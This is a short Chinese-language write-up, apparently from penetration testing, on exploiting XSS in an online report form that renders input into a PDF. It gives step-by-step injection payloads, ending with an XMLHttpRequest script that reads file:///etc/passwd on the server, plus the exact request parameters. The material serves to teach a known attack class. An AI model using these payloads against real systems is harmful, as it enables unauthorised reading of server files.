利用 XSS 漏洞读取任意文件，获得新思路

简述

网站是一个在线填写报表功能，填写好报表之后可以生成报表的pdf文件

思路讲解

1. 发现解析xss

首先随便输入一个payload， "><S>aaa 。发现输入的标签被解析了

2. 用iframe标签加载，但是没有内容

使用iframe标签，但是没有内容。Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=20

3. 确定可以解析js

d=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa')>&date=20

4. 加载url地址发现file协议

Id=b9bc3d&utrnumber=<img src=x onerror=document.write('aaaa'%2bwindow.location)>&date=20

5. 使用XHR(XMLHttpRequest)读取任意文件

<script>

x=new XMLHttpRequest;

x.onload=function(){

document.write(this.responseText)

};

x.open("GET","file:///etc/passwd");

x.send();

</script>

 

Id=b9bc3d&utrnumber=<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>&date=20